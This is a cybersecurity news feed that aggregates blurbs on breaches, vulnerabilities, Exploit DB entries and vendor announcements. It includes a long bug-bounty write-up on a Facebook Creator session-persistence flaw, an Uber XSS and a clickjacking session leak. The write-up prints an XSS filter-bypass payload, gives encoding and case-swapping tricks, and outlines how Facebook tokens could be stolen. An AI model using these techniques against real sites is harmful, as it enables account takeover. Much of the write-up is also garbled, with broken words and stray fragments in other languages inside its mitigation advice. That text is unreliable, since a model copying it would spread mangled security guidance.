by Cybersecurity Dive

Cybercrime has surged, with the FBI receiving over 800,000 complaints that resulted in $12.5 billion in losses, including more than $1 billion in Texas alone, according to a report by MRT.

by SC Media

Automotive cyberattacks have caused tens of billions in damages from 2022 to 2024, highlighting escalating threats to vehicle security, according to a study by cybersecurity firm VicOne, Repairer Driven News reports.

by SC Media

A survey by Naoris Protocol highlights growing concerns among IT leaders over cybersecurity vulnerabilities, indicating that a shift may be needed toward decentralized infrastructure for resilience and security, ComputerWeekly reports.

by SC Media

More than half of all web content requests now come from bots, with AI-driven automation fueling a surge in traffic, according to a report by SiliconAngle.

by SC Media

Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks. [...]

by BleepingComputer

SiliconAngle reports that growing artificial intelligence adoption across the software supply chain has prompted significantly more cybersecurity threats, which were mostly Common Vulnerabilities and Exposures, malicious packages, exposed secrets, and misconfigurations.

by SC Media

House Subcommittee on Cybersecurity and Infrastructure Protection lawmakers have been urged to ratify State and Local Cybersecurity Grant Program funding amid the threat of cutbacks as its efficacy is being doubted by Department of Homeland Security Secretary Kristi Noem, StateScoop reports.

by SC Media

Significant layoffs at the Department of Health and Human Services were regarded by lawmakers and cybersecurity experts to be ultimately detrimental to the safety and security of medical devices, reports The Record, a news site by cybersecurity firm Recorded Future.

by SC Media

A uniform resource identifier (URI) is a character sequence that identifies a logical (abstract) or physical resource -- usually, but not always, connected to the internet.

by ComputerWeekly

Apple backports three critical vulnerabilities actively exploited in attacks against older iOS and macOS models. Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions. The three vulnerabilities are: Apple released the following updates: that are available for the following devices: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, newsletter)

by Security Affairs

Subdomain hijacking is a cybersecurity risk where attackers exploit abandoned DNS records to take control of legitimate subdomains. This can lead to phishing attacks, credential theft, and malware distribution. Organizations must regularly audit DNS records, remove outdated entries, and strengthen cloud security policies to prevent these vulnerabilities.

by Sectigo

Darktrace’s Threat Research team investigated a major campaign exploiting vulnerabilities in Palo Alto firewall devices (CVE 2024-0012 and 2024-9474). Learn about the spike in post-exploitation activities and understand the need for anomaly-based detection to stay ahead of evolving threats.

by Darktrace

This blog explores how Darktrace shut down a major third-party cyber-attack, preventing the deployment of ransomware. Read more to discover how the security team now spends 80-90% of their time working on more strategic projects vs. manual, low-level tasks.

by Darktrace

Exabeam unveiled Exabeam Nova, an autonomous AI agent delivering actionable intelligence that enables security teams to respond faster to incidents, reduce investigation times by over 50%, and mitigate threats more effectively. Exabeam delivers a multi-agent experience where specialized AI components are integrated throughout the security operations workflow. Unlike passive AI assistants that merely retrieve and synthesize data, Exabeam Nova automatically correlates multiple attack signals, actively investigates cases, and classifies threats based on real-world behavioral context … More → The post Exabeam Nova accelerates threat detection and response appeared first on Help Net Security.

by Help Net Security

Discover how Darktrace detected and responded to cyberattacks using Living-off-the-Land (LOTL) tactics to exploit trusted services and tools on customer networks.

by Darktrace

Explore Darktrace''s Annual Threat Report 2024 for insights on the latest cyber threats and trends observed throughout the year.

by Darktrace

Discover how AI-led investigations unify IT and OT security, reducing alert fatigue and accelerating alert investigation in industrial environments.

by Darktrace

Account takeovers are rising with SaaS adoption. Learn how Darktrace detects deviations in user behavior and autonomously stops threats before they escalate.

by Darktrace

This blog explores an exploitation capability observed by Darktrace in another email security vendor’s link rewriting and the steps Darktrace took to inform and resolve the issue.

by Darktrace

Tool designed to validate the network performance of AI workloads and system infrastructure by adjusting and optimising parameters

by ComputerWeekly

Hackers are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely preparing for targeted attacks. Researchers at the threat intelligence firm GreyNoise warn of hackers that are scanning for vulnerabilities in Palo Alto Networks GlobalProtect portals, likely preparing for targeted attacks, warns threat intelligence firm GreyNoise. GreyNoise reports that over 24,000 unique IP addresses […]

by Security Affairs

In an effort to enhance Thailand’s cybersecurity infrastructure, the National Cyber Security Agency (NCSA) and Google Cloud have announced a strategic collaboration to improve cyber resilience. The initiative, launched during Safer Songkran, aligns with ongoing efforts to protect citizens and government entities from escalating cyber threats. This alliance builds on the Thai government’s existing collaboration with Google to enhance online security. As part of this partnership, NCSA and Google Cloud will engage in threat intelligence sharing and develop incident response capabilities to counter evolving cyber threats. This collaboration is particularly crucial as digital transformation in Thailand accelerates, making strong cybersecurity measures a necessity. One key achievement highlighted was Google Play Protect’s anti-scam feature, launched in partnership with the Ministry of Digital Economy and Society (MDES) in 2024, which has successfully blocked over 6.6 million high-risk app installations. To further enhance mobile security, new protections have been introduced to mitigate social engineering attacks that target Thai users. Thailand Government''s Commitment to Cyber Resilience Thailand’s Deputy Prime Minister and Minister of Digital Economy and Society, Prasert Jantararuangtong, emphasized the urgency of strengthening cybersecurity to stop online scams. He acknowledged Google’s commitment to this cause, stating: “Strengthening cybersecurity and combating online scams are paramount and urgent priorities for the government, especially as organizations and individuals increasingly embrace digital innovation. We commend Google for its proactive and continuous efforts in collaborating with us to safeguard citizens online through its cyber literacy programs and implementation of enhanced anti-scam features in Google Play Protect on Android devices.” Secretary General of NCSA, Amorn Chomchoey, reiterated the importance of combining skilled talent with advanced technology. He highlighted how Google Cloud Cybershield and Mandiant’s expertise will serve as critical tools in strengthening Thailand’s cyber defenses. A Coordinated National Cyber Defense Strategy NCSA will deploy Google Cloud Cybershield, an AI-powered security platform that integrates automation, analytics, and threat intelligence. This initiative will enhance centralized monitoring of security threats across public sector entities. Through ThaiCERT, Thailand’s national cyber defense center, a more streamlined and coordinated response to cyber threats targeting government agencies and critical infrastructure will be established. Key components of the collaboration include: Threat Intelligence Sharing: Google Cloud will provide NCSA access to Google Threat Intelligence, Mandiant’s threat insights, and VirusTotal’s database. This will help the government understand and counter cybercriminal tactics and state-sponsored attacks. Incident Response Training: Mandiant consultants will train information security professionals in incident response, digital forensics, and malware analysis. These initiatives will expand Thailand’s pool of cybersecurity experts within the public sector. Protecting Thai Citizens from Cyber Threats Beyond national security, the partnership also aims to enhance individual user protection. NCSA and Google Cloud will integrate Google Cloud Web Risk into government cybersecurity frameworks to defend against online scams and phishing attempts. Web Risk APIs will provide real-time intelligence on malicious websites, allowing NCSA to proactively block access to dangerous URLs. This capability mirrors the functionality of Google Safe Browsing, which analyzes over 10 billion URLs daily and protects more than five billion devices worldwide. Google Cloud’s Thailand Country Director, Annop Siritikul, highlighted the economic importance of cybersecurity: “Thailand’s digital economy is set to grow from US$46 billion in 2024 to at least US$100 billion by 2030. At Google Cloud, we believe we can contribute meaningfully toward the collective cyber defense that’s required to safeguard this future growth.” Enhanced Mobile Security Against Scams Thailand was among the first countries to implement Google Play Protect’s anti-scam feature in 2024. The feature has since prevented over 6.6 million high-risk app installations on more than 1.4 million Android devices in the country. In 2025, Google introduced additional security measures to counter cybercriminals who use social engineering tactics over phone calls. Now, the toggle switch to disable Play Protect’s app scanning feature is locked during phone calls, preventing scammers from deceiving users into disabling security protections. Digital Future for Thailand The Safer Songkran initiative, launched under the Safer with Google program, continues to empower Thai citizens with essential cybersecurity tools and knowledge. The collaboration between NCSA and Google Cloud is a significant step toward building a more secure digital ecosystem for Thailand, ensuring that individuals and organizations can safely benefit from digital transformation. By adopting AI-driven security technologies, advanced threat intelligence, and public-private collaboration, Thailand is strengthening its position as a leader in cybersecurity in the Asia-Pacific region.

by The Cyber Express

With tax season in full swing, we''re seeing scammers flexing their social engineering muscles. Be prepared.

by Malwarebytes Labs

In this Help Net Security interview, Aaron Weismann, CISO at Main Line Health, discusses the growing ransomware threat in healthcare and why the sector remains a prime target. He explains the difficulties of protecting patient information, securing legacy systems, and maintaining cybersecurity without disrupting care. Weismann also shares practical steps for improving incident response and strengthening defenses with limited resources. How have ransomware tactics evolved in the healthcare sector, and what makes healthcare such a … More → The post Balancing data protection and clinical usability in healthcare appeared first on Help Net Security.

by Help Net Security

BlueToolkit is an open-source tool that helps find security flaws in Bluetooth Classic devices. It runs known and custom exploits to test if a device is vulnerable. Right now, it includes 43 different exploits. Some are public, and others were made specifically for this toolkit. “The framework allows you to reuse PoCs of different attacks and connect your own hardware with minimal code/configuration needed. The concept is simple and known – vulnerability scanners make use … More → The post BlueToolkit: Open-source Bluetooth Classic vulnerability testing framework appeared first on Help Net Security.

by Help Net Security

An initialization vector (IV) is an arbitrary number that can be used with a secret key for data encryption to foil cyber attacks.

by ComputerWeekly

Transportation facilities and networks slowly adapt to changes and threats, leaving them vulnerable to agile cyberattackers, as demonstrated by the $10 million ransomware attack.

by Dark Reading

ProSSHD 1.2 - Denial of Service (DOS)

by Exploit DB

SAP NetWeaver - 7.53 - HTTP Request Smuggling

by Exploit DB

ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

by Exploit DB

ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

by Exploit DB

Elaine''s Realtime CRM Automation 6.18.17 - Reflected XSS

by Exploit DB

The new Google Workspace features will make it easier for enterprise customers to implement end-to-end encryption within Gmail.

by Dark Reading

Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm Wiz said the activity is a variant of an intrusion set that was first flagged by Aqua Security in August 2024 that involved the use of a malware strain dubbed PG_MEM. The campaign has been attributed to a threat actor Wiz tracks as

by The Hacker News

Top Data Anonymization Tools of 2025 to protect sensitive information, ensure compliance, and maintain performance across industries.

by Hackread

A successful enterprise security defense requires a successful endpoint security effort. With options ranging from EDR, SIEM, SOAR, and more, how do security teams cut through the clutter and focus on what matters?

by Dark Reading

Wiz recently published a detailed analysis of a critical vulnerability in the NGINX Ingress admission controller—what they’ve dubbed IngressNightmare (CVE-2025-1097, CVE-2025-1098, CVE-2025-1974, CVE-2025-24514). The vulnerability stems from insufficient input validation during configuration file processing, allowing an attacker to inject arbitrary code into the NGINX process. Wiz’s writeup is excellent and covers the technical nuances thoroughly, […] The post An Improved Detection Signature for the Kubernetes IngressNightmare Vulnerability appeared first on Praetorian.

by Praetorian

An investigation that started with a tip from one of our threat intel sources about the revival of the Babuk (figure 1) threat group has led Trustwave SpiderLabs to uncover what appears to be a paradigm shift in the ransomware landscape.

by SpiderLabs Blog

On the 21st birthday of Gmail, Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) to any user in any email inbox in a few clicks. The feature is rolling out starting today in beta, allowing users to send E2EE emails to Gmail users within an organization, with plans to send E2EE emails to any Gmail inbox in the coming weeks and to any email inbox

by The Hacker News

Over the past few weeks, bad actors from different regions have been scanning devices with the VPN for potential vulnerabilities.

by Dark Reading

The Network and Information Systems Directive 2022 (NIS2) was designed to strengthen the cybersecurity resilience of critical infrastructure across the European Union. However, while member states were required to transpose NIS2 into national law by October of 2024, many fell short of this deadline.

by KnowBe4

As of January 17, 2025, the Digital Operational Resilience Act (DORA) came into force across all European Union member states, with the crucial aim of strengthening the IT security of financial entities such as banks, insurance companies and investment firms.

by KnowBe4

99% of phishing emails that reached inboxes last year did not contain malware, according to a new report from Fortra.

by KnowBe4

In this roundtable, cybersecurity experts — including two former CISA executives — weigh in on alternate sources for threat intel, incident response, and other essential cybersecurity services.

by Dark Reading

A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via Apple iMessage and Rich Communication Services (RCS) for Android. Lucid''s unique selling point lies in its weaponizing of legitimate communication platforms to sidestep traditional SMS-based detection mechanisms. ""Its scalable,

by The Hacker News

The bill will allow Japan to implement safeguards and strategies that have been in use by other countries for some time.

by Dark Reading

The security vendor counters that none of the information came directly from its systems but rather was acquired over a period of time by targeting individuals.

by Dark Reading

Microsoft’s offensive security team discovered a critical code execution vulnerability impacting Canon printer drivers.  Researchers at Microsoft’s Offensive Research and Security Engineering (MORSE) team have discovered a critical code execution vulnerability, tracked as CVE-2025-1268 (CVSS score of 9.4), impacting Canon printer drivers.  The vulnerability is an out-of-bounds issue that resides in certain printer drivers for […]

by Security Affairs

Oracle faces a class action lawsuit filed in Texas over a cloud data breach exposing sensitive data of 6M+ users; plaintiff alleges negligence and delays.

by Hackread

Windows 11 PC won''t boot? Microsoft''s Quick Machine Recovery will automatically try to fix it before you have time to panic.

by ZDNET Security

A previously unknown trick lets you easily bypass using a Microsoft Account in Windows 11, just as Microsoft tries to make it harder to use local accounts. [...]

by BleepingComputer

Bottlenecks waste team time, energy, and resources. Here''s how to prevent getting stuck.

by ITPro Today

The open source repository of genetic data will delete its banks of data on April 30, its co-founder confirms.

by TechCrunch

Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the operating systems. The vulnerabilities in question are listed below - CVE-2025-24085 (CVSS score: 7.3) - A use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate

by The Hacker News

Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly 24,000 unique IP addresses attempting to access these portals. ""This pattern suggests a coordinated effort to probe network defenses and identify exposed or vulnerable systems, potentially as a precursor to targeted exploitation,"" threat

by The Hacker News

Privacy matters. These apps and services help you communicate without putting your identity or data at risk from prying eyes.

by ZDNET Security

In the competitive world where artificial intelligence (AI) has made it easy to use technology, companies are constantly…

by Hackread

Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, technology, logistics, manufacturing, telecommunications, IT services, and retail in the Asia-Pacific (APAC) and Latin American (LATAM) regions. ""The first sighting of its activity was in the second quarter of 2023; back then, it was

by The Hacker News

Are your security tokens truly secure? Explore how Reflectiz helped a giant retailer to expose a Facebook pixel that was covertly tracking sensitive CSRF tokens due to human error misconfigurations. Learn about the detection process, response strategies, and steps taken to mitigate this critical issue. Download the full case study here.  By implementing Reflectiz''s recommendations, the

by The Hacker News

An obscure wannabe hacker''s tantalizing (and clearly sketchy) job offer has some security researchers asking, why?

by TechCrunch

Introduction: The Illusion of Logging Out Picture ceasing to hand in your office keycard only for it to still open up the building months down the line. That’s what this Facebook login session expiration bypass in Facebook Creator App is all about. Although users logged out from all devices or changed passwords, attackers could enjoy permanent access—uploading or delete posts, sending messages to followers ad infinitum. This was a Session persistence flaw, not a Session theft flaw, you’d have several functions which the App displayed a “Session Expired"" but it actually turned a blind eye. The playing field was like this for businesses and for creators, the stakes were incredibly high, if one were to get hacked with either a compromised account it could be brand sabotage, or financial loss or you know reputation damage. 🔍 Case Study Breakdowns Case Study1: Session Expiration Bypass in Facebook Creator App The Never-Ending Session: How a Facebook Flaw Let Hackers Stay Logged In Forever (And Why Logging Out Isn’t Always Enough) Vulnerability TypeSession expiration bypass via offline action queuing ImpactAttackers could maintain permanent access to accounts—even after password changes or forced logouts. SignificanceThis flaw turned a “log out all devices” feature into a placebo, undermining user trust in critical security controls. Bounty Awarded$2500 Bug Bounty WriteupMedium Article Vulnerability Explanation: When “Logged Out” Doesn’t Mean “Locked Out” Imagine firing an employee, only to watch them keep working because their computer didn’t get the memo. That’s what happened here. Facebook Creator Studio—a tool for managing Pages—failed to fully invalidate sessions, allowing attackers to linger and tamper with sessions. ==Sessions are like temporary access badges: they should expire immediately when revoked. But in this case, the Facebook Creator App treated session termination as a suggestion, not a rule.== Exploitation Process: Hacking in the Dark Step 1: The “What If?” Moment Ajay (the bounty hunter) thought to himself: “But what if logging out of your all sessions does not disable it in actuality?” His thought:Security features usually focuses on showing nice feedback on UI, but advantages consistency in backend. Step 2: Two Devices, One Trap Device A (Laptop): Logged into Facebook Creator Studio. Device B (Phone): Also online. **Logout Triggeredilimn:From yAA Device A, he logouted all active sessions. Device B’s Response: Indicated “session expired” but…. Step 3: The Airplane Mode Trick Disable Wi-Fi/mobile data on device B. Restart app (still offline). Made a post, clicked “Publish button” (pu concurrently). Restored internet: The post uploaded to Facebook’s servers. Creative Twist: The application blindly trusted offline activities and failed to re-verify the session validity when it recabled. As if sending a package after your mailbox has been destroyed—the postal service still delivers it. Mitigation Server-Side Session Kill Switches: Invalidate sessions globally, not just in the UI. Validate Before Syncronizing: Check session status before running through queus of actions. Force Reauthentication: Prompt login for high-risk actions following network indisposed. **Pro Tip: Use Burp Suite to capture and replay requests post-logout. ** Stay skeptical, test offline, and remember: sessions can haunt you. 👻 Case Study 2: When a Typo Uncovers a Goldmine Hacking Uber with a Single Slash: The XSS Trick That Stole Facebook Sessions (And Why Tiny Flaws Can Have Massive Consequences) Vulnerability TypeCross-Site Scripting (XSS) leading to Facebook session token theft ImpactFull account takeover via stolen Facebook credentials. SignificanceA chain reaction of small flaws—bypassed filters, weak CSP, and misconfigured ACLs—turned a minor bug into a critical exploit. Bounty Awarded$1500 Original WriteupMedium Article Vulnerability Description: chained with Facebook’s API to steal tokens. Picture the approach of a burglar prowling out from a broken window, and he finds that the keys for a vault are contained. That’s what happened here. One badly misconfigured Uber endpoint, coupled with poor security protection, enabled hackers to seize Facebook sessions—the reason, a missing slash and a case-sensitive oversight. XSS is like putting a slug of flawed counterfeited in a mailbox: attackers vector bad scripts into materials finer websites, positive more than browsers to handle them. Here, Uber’s blog search endpoint (/es-CL/blog/santiago/search/) was also susceptible to user input sanitization issues. Exploitation Process: Step 1: The Midnight Hunt Feeling stuck in bug hunt, the researcher pivoted to Uber at 2:00 AM. Brute-forcing endpoints is what led to a blog search page. His idea: “Static sites usually bury unused functionality”. Let’s poke it.” Step 2: Breaking the Filter Initial XSS payloads failed. But persistence paid off. Here is how the author came to this payload: URL Encoder API let HTML tags to be passed like `<` and `>`, but forbid the `/` character and the word ""script""; Encoding the slash as `%2f` and changing cases (e.g., `scripT`) to avoid those filters, the researcher managed to get around the algorithm. This allowed decrypting arbitrary JavaScript—to finally steal Facebook tokens which belonged to Uber user’s account. Bypass 1: Marianobit steeper %2f instead of / to avoid keyword blocking. Bypass 2: Use mixed-case <scripT> to bypass case-sensitive filters. Final Payload: <%fscripT><script>confirm(document.domain)<%2fscripT> This ran the Javascript wich prooved the vulnerability. Step 3. Moving Up To Facebook Token Theft At a hacker conference, a partner proposed the idea of binding the XSS to Facebook API. The point: *“Uber accepts Facebook IDs. If we can pull tokens, we own the account.” The last JavaScript used by the attacker is something like that: The Kill Chain: Bait the victim to the malicious page carring the XSS. Run JavaScript to steal tokens by Facebook’s FB.getLoginStatus(). **Bypass CSP: Uber’s misconfigured content security policy trusted external scripts. Creative Twist: Uber’s login flow was split between www.uber.com (static site) and auth.uber.com (auth). XSS on the static site was still able to interact with logged in individuals - a big error. Mitigation Mitigation: Sanitize Input Unapologetically: Apply a broad galer of all html special-character unless admitted by explicitly. Köprü CSP: script-src ''self'' engelJosBu_scripts. Separate Authentication as Specific Cases: Dedicate login logic to be away from static-content. How to Find Such Vulnerabilities in real world? **Fuzz Forgotten Page: Burp Suite o manualizzarsi. Break Filters Playfully: Entreprise encoding, case-swapping ou syntaxe cruelle. Think Outside The Box: Always ask yourself, “What can I link this vulnerability with?” Case Study 3: Session - Jacking with clickjacking Unmasking the Hidden Danger: How a Missing Header Led to Session Hijacking (And What It Teaches Us About Web Security) Introduction: The Silent Threat in Your Browser Vulnerability TypeClickjacking via a missing X-FRAME-OPTIONS header ImpactAttackers could steal session cookies, leading to full account takeover SignificanceThis flaw bypassed the app’s otherwise robust defenses, proving that one weak link can break the chain. Bounty Awarded$100 Original WriteupMedium Article Click-JACKING: When Your Screen Lies to You Clickjacking is akin to a magic trick of the web kind: attackers shield and conceals malicious elements on top of a genuine webpage, fooling victims into clicking something they really meant not to. Without the X-FRAME-OPTIONS header—which indicates whether a page can be framed—malsite can load text page in hidden iframe and hijack clicks. Impact: The weak endpoint disclosed the sensitive session data (usernames, session IDs) in its response. An attacker can engage in frame injection and trick a logged in user to perform activities (like click a hidden button) that expose session. Några exploit koden ingenting—bara vinande visuell bedrägeri. Exploitation Process: The Art of Digital Sleuthing Step 1: Finding Hidden Vectors The researcher had put days into brute-forcing directories (i.e., checking each door in a building to discover the unlocked ones). The jackpot? An interfaz Endpoint (/ping/loggedIn) a la que se reciben los detalles sesión: {""username"": ""arbazkiraak007"", ""sessionId"": ""54CA86A999CB2DE0CD87F1EB37289261-n3""} Step 2: The “Aha!” Moment Why check this endpoint for clickjack? Because it leaked session IDs. The defector’s thought process: “If I can frame this page, I can steal cookies secretly.” A quick sniff showed the absent X-FRAME-OPTIONS header—unlike other endpoints which framed undermined. Step 3: The Copy-Paste Game No advanced tools needed. He simply constructed a simple HTML page with the vulnerable endpoint embedded in an invisible iframe in it. When someone lands on malicious page and their browser quietly goes out and hits the target endpoint and shoots their session ID flying. Creative Twist: The endpoint itself was not interactive - it only leaked data. But by going through framing of it, so attacker can associate it with social engineer (i.e., “Click here for free gift!”, devious way to seduce users in generating the request. Impact and Mitigation: When a Small Flaw Becomes a Big Problem Worst-Case Scenario: Account takeover, data breaches, or lateral movement within the app. Mitigation: Add the Header: Set X-FRAME-OPTIONS: DENY or SAMEORIGIN on all endpoints. Content Security Policy (CSP): Use frame-ancestors to whitelist trusted domains. Audit Relentlessly: Automated scans miss edge cases. Manually review lesser-used endpoints. Conclusion: Trust, But Verify Any security system’s vulnerability stems from its weakest point since the Facebook Creator App displayed such a weakness. The implementation of bypasses in security systems occurs when developers choose to enable user-friendly features instead of fundamental security provisions. The Facebook Creator App vulnerability points to multiple vital lessons we need to learn from it. Visual logout confirmation deceives users because it does not terminate server-based sessions effectively. Security integrity requires that offline operational features must make users re-authenticate upon re-connecting to network services. Every feature needs to pass complete tests within different connection setups which test for system weaknesses during unstable wireless network situations. Security professionals need to implement more than code review services because they should adopt zettachrisity which requires server-sided verification before granting session access. Electronic hackers persistently exploit these vulnerability gaps by targeting the offline queue systems because they contain greater accessibility weaknesses than complex secure systems. Stay skeptical, test offline, and remember: sessions can haunt you. 👻

by HACKLIDO

Every minute, GitHub blocks several secrets with push protection—but secret leaks still remain one of the most common causes of security incidents. Learn how GitHub is making it easier to protect yourself from exposed secrets, including today’s launches of standalone Secret Protection, org-wide scanning, and better access for teams of all sizes. The post GitHub found 39M secret leaks in 2024. Here’s what we’re doing to help appeared first on The GitHub Blog.

by The GitHub Blog

​North Korea''s IT workers have expanded operations beyond the United States and are now increasingly targeting organizations across Europe. [...]

by BleepingComputer

Google has announced a significant upgrade to Gmail for enterprise, now giving the ability to send end-to-end encrypted (E2EE) emails to any inbox with minimal setup. Starting today, Gmail users in participating organizations can begin sending E2EE messages within their own domains, with support for all Gmail users rolling out in the coming weeks — … The post Google Rolls Out Simplified End-to-End Encrypted Email in Gmail appeared first on CyberInsider.

by Cyber Insider

Web browsers have long exposed users to a subtle but powerful privacy risk: the ability for malicious sites to detect which links a user has previously visited. In 2025, that issue may finally be resolved. A new proposal — now implemented in experimental builds of Chrome — introduces partitioned visited link history, a significant change … The post Chrome to Fix Decades-Old Browsing History Privacy Leak Problem appeared first on CyberInsider.

by Cyber Insider

Attackers exploit CrushFTP CVE-2025-2825 flaw, enabling unauthenticated access to unpatched devices using public proof-of-concept code. Threat actors are exploiting a critical authentication bypass vulnerability, tracked as CVE-2025-2825, in the CrushFTP file transfer software. Attackers are using exploits based on publicly available proof-of-concept exploit code. The vulnerability impacts CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0, it […]

by Security Affairs

Following up on having the fastest purge in the industry, we have now increased Instant Purge quotas across all Cloudflare plans.

by Cloudflare

The FDA''s regulations and guidance aim to strike a balance between ensuring rigorous oversight and enabling manufacturers to act swiftly when vulnerabilities are discovered.

by Dark Reading

Tenable released details of a Google Cloud Run flaw that prior to remediation allowed a threat actor to escalate privileges.

by Dark Reading

A continuation of the North Korean nation-state threat''s campaign against employment seekers uses the social engineering attack to target CeFi organizations with the GolangGhost backdoor.

by Dark Reading

Sending encrypted emails today involves a nightmare of certificates and administrative headaches. Google says it''s ready to make things easier.

by ZDNET Security

by KnowBe4

The prolific gang is linked to the exploitation of critical flaws in Cleo file transfer software.

by Cybersecurity Dive

Questions and confusion surround the authentication bypass vulnerability, which was privately disclosed to customers on March 21.

by Cybersecurity Dive

Your friends and family members are just waiting to be exploited by online attackers. They need your help.

by ZDNET Security

France fines Apple €150M for abusing its dominance in ATT consent practices on iOS and iPadOS from 2021 to 2023. France’s Autorité de la concurrence fined Apple €150M for abusing its dominance in App Tracking Transparency (ATT) consent practices on iOS and iPadOS between April 26, 2021 and July 25, 2023. Apple launched ATT with […]

by Security Affairs

Apple has been hit with a fine of €150 million ($162 million) by France''s competition watchdog over the implementation of its App Tracking Transparency (ATT) privacy framework. The Autorité de la concurrence said it''s imposing a financial penalty against Apple for abusing its dominant position as a distributor of mobile applications for iOS and iPadOS devices between April 26, 2021 and July 25,

by The Hacker News

A number of specialized dating apps leaked the--not so--secret storage location of 1.5 Million more or less explicit images

by Malwarebytes Labs

Learn how to mediate a team’s cloud debate by evaluating business needs, exploring multi-cloud options, and applying structured decision-making.

by ITPro Today

Want to avoid having your online accounts hacked? Two-factor authentication is a crucial security measure that requires an extra step for signing in to high-value services. Here''s how to set up 2FA and which accounts to focus on.

by ZDNET Security

Marking the 21st anniversary of Gmail, Google is preparing to roll out an end-to-end encryption standard for its email service in hopes of democratising encryption and leaving old standards in the dust

by ComputerWeekly

Attack matches three-year long pattern of ScreenConnect attacks tracked by Sophos MDR as STAC4365.

by Sophos News

The Microsoft Fabric Community Conference, currently underway from March 31 to April 2, 2025, in Las Vegas, has already become a major event for data professionals and AI enthusiasts alike. With over 200 sessions, 13 specialized tracks, and numerous hands-on workshops, the conference is attracting industry experts and users who are eager to explore the evolving landscape of data security and AI governance. The annual event is a platform for sharing insights, with a focus on key topics such as data security, governance, and the rapid advancements in artificial intelligence (AI) technologies. As AI continues to revolutionize various industries, organizations are also facing growing challenges surrounding data protection, governance, and regulatory compliance. AI’s Role in Data Security and Governance AI has become deeply integrated into the daily work of many professionals. A significant 75% of knowledge workers now use some form of AI in their daily tasks, contributing to its widespread adoption. However, this widespread use of AI comes with its own set of challenges. Governments around the world are moving quickly to address the potential risks and ethical concerns associated with AI. Over 69 countries have proposed over 1,000 AI-related policy initiatives, and businesses must navigate an increasingly complex regulatory environment to ensure compliance. As companies continue to adopt AI technologies, they are also seeking comprehensive solutions to address data security, governance, and privacy issues. These solutions are essential not only for compliance with emerging regulations but also for mitigating the risks of data leaks, oversharing, and unauthorized access to sensitive information. The Growing Need for Security and Governance Solutions At the conference, Microsoft unveiled several new innovations designed to help organizations tackle these challenges as they embrace AI and new data management practices. Among the key announcements: Enhancing Data Loss Prevention for Lakehouse in Microsoft Fabric Microsoft Purview’s Data Loss Prevention (DLP) capabilities, which are already integrated with Microsoft 365, are now expanding to better protect sensitive data in lakehouse environments within Microsoft Fabric. These enhancements aim to help prevent data loss by restricting access based on data sensitivity. Data security administrators can configure policies to ensure that only internal users or authorized data owners have access to sensitive information. This functionality is especially crucial when working with guest users in Fabric, as it ensures that proprietary data remains secure. Expanding DLP Support for More Fabric Items In a bid to offer more comprehensive data protection, Microsoft is expanding DLP policy support for additional Fabric items, including KQL (Kusto Query Language) and Mirrored databases. These databases are essential for real-time analytics and contain large amounts of sensitive data. The extension of Purview DLP support to these sources helps users receive notifications when they interact with sensitive data, thus minimizing the risk of accidental data leakage. The expansion also includes databases like Azure Cosmos DB, Azure SQL, and Snowflake, which are part of a broader strategy to safeguard data across diverse environments. Integration with Copilot for Power BI AI has raised new concerns about data security, particularly when it comes to the use of tools like Copilot. Microsoft is now integrating Microsoft Purview with Copilot for Power BI, which aims to provide users with greater visibility into potential data risks associated with AI-driven prompts and responses. Through the Microsoft Purview Data Security Posture Management (DSPM) dashboard, users will receive alerts and recommended actions to mitigate risks related to sensitive data. This integration also supports monitoring AI usage, helping organizations identify potential risks of non-compliant AI practices, such as unauthorized sharing of sensitive data or misuse by departing employees. Introducing Data Observability in Microsoft Purview Unified Catalog One of the most anticipated announcements is the introduction of data observability within the Microsoft Purview Unified Catalog, now available in preview. This feature allows organizations to visually investigate data quality issues and trace their root causes through an interactive interface. Users can track the relationships between governance domains, data products, and data assets across multicloud and hybrid environments. This tool is designed to improve data quality, a critical aspect of ensuring AI systems operate effectively and comply with regulatory reporting requirements. A Unified Approach to Data Security and AI Governance As organizations continue to integrate AI into their operations, the importance of safeguarding data and ensuring compliance with evolving regulations will only increase. Microsoft’s announcements at the conference aim to help companies address these challenges by providing comprehensive, integrated tools that offer greater control over data management and security. The intersection of AI, data security, and governance is becoming increasingly complex, and it is clear that organizations must adopt more advanced and integrated solutions to navigate this evolving landscape. The ability to seamlessly manage data across multiple platforms, enforce policies around data usage, and ensure compliance with global regulatory standards will be key to safely unlocking the full potential of AI technologies.

by The Cyber Express

A misconfigured Elasticsearch database belonging to APIsec.ai, a security firm claiming to serve 80% of the Fortune 100, was discovered leaking over three terabytes of highly sensitive customer data — including API scan results, configuration secrets, and personally identifiable information (PII). The discovery was made by UpGuard’s Greg Pollock during routine scanning for exposed cloud … The post Security Firm APIsec Exposed 3TB of Sensitive Customer Data appeared first on CyberInsider.

by Cyber Insider

Phishing with QR codes: New tactics described here include concealing links with redirects and using Cloudflare Turnstile to evade security crawlers. The post Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon appeared first on Unit 42.

by Palo Alto Networks - Unit42

One missed update turned my website into a hacker''s playground and another locked me out of my own business tools. Here''s why skipping software updates isn''t worth the risk.

by ZDNET Security

